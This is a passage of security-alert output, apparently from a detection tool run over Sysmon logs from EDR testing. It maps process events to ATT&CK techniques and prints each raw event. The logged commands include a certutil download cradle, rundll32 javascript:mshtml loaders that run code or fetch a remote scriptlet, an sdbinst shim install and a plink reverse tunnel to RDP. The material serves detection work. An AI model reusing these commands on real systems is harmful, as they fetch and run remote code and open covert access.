<Data Name=""ParentCommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
</TimeCreated>
<EventRecordID>4980</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ParentProcessId"">7088</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.238305Z"">
</TimeCreated>
<EventRecordID>4978</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.134</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ProcessId"">7088</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:58:20.994444Z"">
</TimeCreated>
<EventRecordID>1966480</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:58:20.894</Data>
<Data Name=""ProcessGuid"">365ABB72-57EC-5C91-0000-001097810900</Data>
<Data Name=""ProcessId"">2848</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Users\user01\Desktop\titi.sdb&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\user01\Desktop\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.226408Z"">
</TimeCreated>
<EventRecordID>4975</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.202</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ProcessId"">1808</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:47.474867Z"">
</TimeCreated>
<EventRecordID>1966464</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:47.364</Data>
<Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-0010D96C0800</Data>
<Data Name=""ProcessId"">3140</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-16T10:02:21.934438Z"">
</TimeCreated>
<EventRecordID>1940899</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1728"" ThreadID=""412"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-02-16 10:02:21.934</Data>
<Data Name=""ProcessGuid"">365ABB72-DFAD-5C67-0000-0010E0811500</Data>
<Data Name=""ProcessId"">2312</Data>
<Data Name=""Image"">C:\Users\IEUser\Desktop\plink.exe</Data>
<Data Name=""FileVersion"">Release 0.70</Data>
<Data Name=""Description"">Command-line SSH, Telnet, and Rlogin client</Data>
<Data Name=""Product"">PuTTY suite</Data>
<Data Name=""Company"">Simon Tatham</Data>
<Data Name=""CommandLine"">plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">PC01\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-D6AB-5C67-0000-002056660200</Data>
<Data Name=""LogonId"">0x26656</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D92A-5C67-0000-0010CB580900</Data>
<Data Name=""ParentProcessId"">3904</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;))",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
